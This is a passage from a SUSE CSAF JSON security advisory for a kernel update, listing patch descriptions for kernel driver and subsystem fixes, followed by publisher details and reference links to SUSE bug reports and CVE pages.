of: fix reference count leak in of_alias_scan() (git-fixes).\n- of: platform: Use default match table for /firmware (git-fixes).\n- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).\n- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).\n- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).\n- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).\n- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).\n- platform/x86/amd: Fix memory leak in wbrf_record() (git-fixes).\n- platform/x86: hp-bioscfg: Fix automatic module loading (git-fixes).\n- platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro (git-fixes).\n- platform/x86: hp-bioscfg: Fix kobject warnings for empty attribute names (git-fixes).\n- pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() (git-fixes).\n- powercap: fix race condition in register_control_type() (stable-fixes).\n- powercap: fix sscanf() error return value handling (stable-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).\n- sched/rt: Skip group schedulable check with rt_group_sched=0 (bsc#1256568).\n- sched: Increase sched_tick_remote timeout (bsc#1254510).\n- scripts/python/git_sort/git_sort.yaml: add cifs for-next repository.\n- scripts: obsapi: Support URL trailing / in oscrc.\n- scripts: teaapi: Add paging.\n- scripts: uploader: Fix no change condition for _maintainership.json.\n- scripts: uploader: Handle missing upstream in is_pr_open.\n- scrits: teaapi: Add list_repos.\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests/bpf: Fix flaky bpf_cookie selftest (git-fixes).\n- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).\n- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).\n- slimbus: core: fix OF node leak on registration failure (git-fixes).\n- slimbus: core: fix device reference leak on report present (git-fixes).\n- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).\n- slimbus: core: fix runtime PM imbalance on report present (git-fixes).\n- smb3: add missing null server pointer check (git-fixes).\n- smb: change return type of cached_dir_lease_break() to bool (git-fixes).\n- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).\n- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).\n- smb: client: fix warning when reconnecting channel (git-fixes).\n- smb: client: introduce close_cached_dir_locked() (git-fixes).\n- smb: client: remove unused fid_lock (git-fixes).\n- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748 bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).\n- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).\n- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).\n- svcrdma: return 0 on success from svc_rdma_copy_inline_range (git-fixes).\n- uacce: ensure safe queue release with state management (git-fixes).\n- uacce: fix cdev handling in the cleanup path (git-fixes).\n- uacce: fix isolate sysfs check condition (git-fixes).\n- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).\n- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).\n- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).\n- usbnet: limit max_mtu based on device\u0027s hard_mtu (git-fixes).\n- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).\n- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).\n- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).\n- wifi: mac80211: don\u0027t perform DA check on S1G beacon (git-fixes).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).\n- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).\n- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).\n- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).\n- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).\n- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).\n- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches\n (bsc#1256528).\n- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).\n- x86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value (bsc#1256528).\n- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).\n- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).\n- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).\n- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).\n- x86: make page fault handling disable interrupts properly (git-fixes).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-587,SUSE-SLE-Module-Live-Patching-15-SP7-2026-587,SUSE-SLE-Module-RT-15-SP7-2026-587",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_0587-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:0587-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260587-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:0587-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024356.html"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1223800",
"url": "https://bugzilla.suse.com/1223800"
},
{
"category": "self",
"summary": "SUSE Bug 1228490",
"url": "https://bugzilla.suse.com/1228490"
},
{
"category": "self",
"summary": "SUSE Bug 1233563",
"url": "https://bugzilla.suse.com/1233563"
},
{
"category": "self",
"summary": "SUSE Bug 1234842",
"url": "https://bugzilla.suse.com/1234842"
},
{
"category": "self",
"summary": "SUSE Bug 1235566",
"url": "https://bugzilla.suse.com/1235566"
},
{
"category": "self",
"summary": "SUSE Bug 1241437",
"url": "https://bugzilla.suse.com/1241437"
},
{
"category": "self",
"summary": "SUSE Bug 1242505",
"url": "https://bugzilla.suse.com/1242505"
},
{
"category": "self",
"summary": "SUSE Bug 1242909",
"url": "https://bugzilla.suse.com/1242909"
},
{
"category": "self",
"summary": "SUSE Bug 1243662",
"url": "https://bugzilla.suse.com/1243662"
},
{
"category": "self",
"summary": "SUSE Bug 1243677",
"url": "https://bugzilla.suse.com/1243677"
},
{
"category": "self",
"summary": "SUSE Bug 1243678",
"url": "https://bugzilla.suse.com/1243678"
},
{
"category": "self",
"summary": "SUSE Bug 1245538",
"url": "https://bugzilla.suse.com/1245538"
},
{
"category": "self",
"summary": "SUSE Bug 1246022",
"url": "https://bugzilla.suse.com/1246022"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246447",
"url": "https://bugzilla.suse.com/1246447"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249904",
"url": "https://bugzilla.suse.com/1249904"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252511",
"url": "https://bugzilla.suse.com/1252511"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253330",
"url": "https://bugzilla.suse.com/1253330"
},
{
"category": "self",
"summary": "SUSE Bug 1253340",
"url": "https://bugzilla.suse.com/1253340"
},
{
"category": "self",
"summary": "SUSE Bug 1253348",
"url": "https://bugzilla.suse.com/1253348"
},
{
"category": "self",
"summary": "SUSE Bug 1253433",
"url": "https://bugzilla.suse.com/1253433"
},
{
"category": "self",
"summary": "SUSE Bug 1253443",
"url": "https://bugzilla.suse.com/1253443"
},
{
"category": "self",
"summary": "SUSE Bug 1253451",
"url": "https://bugzilla.suse.com/1253451"
},
{
"category": "self",
"summary": "SUSE Bug 1253471",
"url": "https://bugzilla.suse.com/1253471"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254465",
"url": "https://bugzilla.suse.com/1254465"
},
{
"category": "self",
"summary": "SUSE Bug 1254510",
"url": "https://bugzilla.suse.com/1254510"
},
{
"category": "self",
"summary": "SUSE Bug 1254624",
"url": "https://bugzilla.suse.com/1254624"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1254835",
"url": "https://bugzilla.suse.com/1254835"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254852",
"url": "https://bugzilla.suse.com/1254852"
},
{
"category": "self",
"summary": "SUSE Bug 1254871",
"url": "https://bugzilla.suse.com/1254871"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255120",
"url": "https://bugzilla.suse.com/1255120"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255138",
"url": "https://bugzilla.suse.com/1255138"
},
{
"category": "self",
"summary": "SUSE Bug 1255140",
"url": "https://bugzilla.suse.com/1255140"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255226",
"url": "https://bugzilla.suse.com/1255226"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255255",
"url": "https://bugzilla.suse.com/1255255"
},
{
"category": "self",
"summary": "SUSE Bug 1255260",
"url": "https://bugzilla.suse.com/1255260"
},
{
"category": "self",
"summary": "SUSE Bug 1255261",
"url": "https://bugzilla.suse.com/1255261"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255346",
"url": "https://bugzilla.suse.com/1255346"
},
{
"category": "self",
"summary": "SUSE Bug 1255377",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "self",
"summary": "SUSE Bug 1255401",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255488",
"url": "https://bugzilla.suse.com/1255488"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255539",
"url": "https://bugzilla.suse.com/1255539"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255548",
"url": "https://bugzilla.suse.com/1255548"
},
{
"category": "self",
"summary": "SUSE Bug 1255552",
"url": "https://bugzilla.suse.com/1255552"
},
{
"category": "self",
"summary": "SUSE Bug 1255568",
"url": "https://bugzilla.suse.com/1255568"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255615",
"url": "https://bugzilla.suse.com/1255615"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1256280",
"url": "https://bugzilla.suse.com/1256280"
},
{
"category": "self",
"summary": "SUSE Bug 1256528",
"url": "https://bugzilla.suse.com/1256528"
},
{
"category": "self",
"summary": "SUSE Bug 1256568",
"url": "https://bugzilla.suse.com/1256568"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256592",
"url": "https://bugzilla.suse.com/1256592"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256594",
"url": "https://bugzilla.suse.com/1256594"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256606",
"url": "https://bugzilla.suse.com/1256606"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256608",
"url": "https://bugzilla.suse.com/1256608"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256627",
"url": "https://bugzilla.suse.com/1256627"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256661",
"url": "https://bugzilla.suse.com/1256661"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256690",
"url": "https://bugzilla.suse.com/1256690"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256748",
"url": "https://bugzilla.suse.com/1256748"
},
{
"category": "self",
"summary": "SUSE Bug 1256749",
"url": "https://bugzilla.suse.com/1256749"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256756",
"url": "https://bugzilla.suse.com/1256756"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256794",
"url": "https://bugzilla.suse.com/1256794"
},
{
"category": "self",
"summary": "SUSE Bug 1256861",
"url": "https://bugzilla.suse.com/1256861"
},
{
"category": "self",
"summary": "SUSE Bug 1256863",
"url": "https://bugzilla.suse.com/1256863"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257167",
"url": "https://bugzilla.suse.com/1257167"
},
{
"category": "self",
"summary": "SUSE Bug 1257168",
"url": "https://bugzilla.suse.com/1257168"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53714 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53714/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54013 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54013/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-27005 page",
"url": "https://www.suse.com/security/cve/CVE-2024-27005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-42103 page",
"url": "https://www.suse.com/security/cve/CVE-2024-42103/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53070 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53149 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-56721 page",
"url": "https://www.suse.com/security/cve/CVE-2024-56721/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22047 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22047/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37751 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37751/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38209 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
